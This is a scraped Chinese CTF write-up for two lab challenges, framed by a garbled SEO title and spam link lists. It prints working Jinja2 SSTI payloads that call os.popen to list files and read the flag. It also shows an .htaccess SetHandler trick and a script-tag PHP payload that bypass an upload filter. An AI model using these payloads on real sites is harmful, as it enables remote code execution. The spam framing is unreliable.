当前位置: 首页 > news >正文

做电子简历的网站能翻到国外的浏览器

做电子简历的网站,能翻到国外的浏览器,邵阳建设网站公司,吴桥县网站建设价格目录 [HNCTF 2022 WEEK2]ez_SSTI 1、题目 2、知识点 3、思路 [SWPUCTF 2022 新生赛]Ez_upload 1、题目 2、知识点 3、思路 [HNCTF 2022 WEEK2]ez_SSTI 1、题目 2、知识点 SSTI、Jinja2 参考链接:1. SSTI(模板注入)漏洞(…

目录

[HNCTF 2022 WEEK2]ez_SSTI

1、题目

2、知识点

3、思路

[SWPUCTF 2022 新生赛]Ez_upload

1、题目

2、知识点

3、思路


[HNCTF 2022 WEEK2]ez_SSTI

1、题目

2、知识点

SSTI、Jinja2

参考链接:1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)

3、思路

题目提示我们是SSTI,打开链接,里面是一些有关SSTI的知识

我们不知道网站是用什么语言的,抓包看看

这里可以看到python,跟python有关的SSTI框架模板:Jinja2 (Python)、Mako (Python)(这些在题目的链接可以看到),接下来就尝试网站是用哪种模板,先尝试jinja2,但是我们不知道注入点在哪,不知道变量名,看了上面的参考文章,jinja2的变量名跟name有关,可以尝试name

?name={{7*7}}

结果正常回显,说明当前网站是用jinja2的框架,且变量名为name

知道变量名接下来就是构造payload了

?name={{''.__class__.__base__.__subclasses__()}}

通过__class__获取字典对象所属的类,再通过__base__(__bases[0]__)拿到基类,然后使用__subclasses__()获取子类列表,在子类列表中直接寻找可以利用的类

如果存在os类,那我们可以通过这些类执行eval等函数

接下来我们利用这个类,这个类位于137,这些payload可以记起来,遇到可以用

?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}

?name={{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat flag").read()')}}

得到flag:NSSCTF{71ead462-471d-4863-b7ed-a97c9afcf81c}


[SWPUCTF 2022 新生赛]Ez_upload

1、题目

2、知识点

文件上传、.htaccess、MIME类型

3、思路

上传一个正常的文件

上传失败,很可能是文件大小作了限制

上传一个php文件

这里对后缀名进行了过滤

上传一个带有php内容的jpg文件

说明也对文件内容进行了过滤

这里尝试绕过的方式有很多,例如,抓包更改文件后缀名、大小写绕过、php3、phtml等

这边尝试看能不能上传.htaccess文件

可以上传成功,注:Content-Type: image/jpeg

.htaccess

<FilesMatch "muma.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传成功后,我们再上传一个muma.jpg文件,因为对文件内容进行了检测,不能有php代码,所以我们使用javascript语句

muma.jpg

## 一句话木马
<script language='php'>phpinfo();</script>

上传成功,然后访问成功的路径,可以正常访问

里面的php代码正常执行,寻找flag

得到flag:NSSCTF{be92eb2e-a020-43c6-bf04-d99099bbff69}


这篇文章就先记录到这里,哪里不懂的或者哪里不足的欢迎指出

http://www.zhongyajixie.com/news/26237.html

相关文章:

  • 手机开网店0元加盟店广州seo报价
  • 无锡专业做网站的公司模板网站建站公司
  • 网站开发技术与vb泰州百度seo
  • 安卓app开发如何获取网站的seo
  • 叫外包公司做网站不肯给源代码的seo百度关键词排名
  • 跨境电商网站如何做推广济南网站建设哪家好
  • 258网站建设培训课程安排
  • 金融网站建设成功案例营销咨询公司排名
  • 做网站多少钱_西宁君博优选seo推广费用
  • 做网站都需要准备什么软件怎么开通网站平台
  • 湖南建设人力资源湖南网站建设seo网站关键词排名软件
  • 建一个o2o网站百度软件商店下载安装
  • 深圳b2b网站建设排名企业网站设计毕业论文
  • 网站为什么要挂服务器上推广赚佣金项目
  • 网站建设只有20%的利润公司注册流程
  • 服务器和域名如何做网站网络营销考试答案
  • 帝国cms做门户网站百度预测大数据官网
  • 手机游戏的官方网站开发是同步进行的么?网络营销和推广的方法
  • win7怎么做网站网站域名解析ip查询
  • 网站的推广代码是什么建站平台如何隐藏技术支持
  • 华大网站建设百度手机助手免费下载
  • 做网站是com好还是cn好广州新一期lpr
  • 秦皇岛做网站seo的网站推广推广
  • 做微信的微网站费用多少合适市场调研的基本流程
  • vs 2008网站做安装包广告营销
  • wordpress4.6 手册seo排名优化收费
  • 太原网站制作在线林云seo博客
  • 广西城乡住房建设厅网站首页广州seo关键词优化外包
  • 5g网站空间需要多少钱刷seo关键词排名软件
  • 做折扣的网站有哪些在哪里找软件开发公司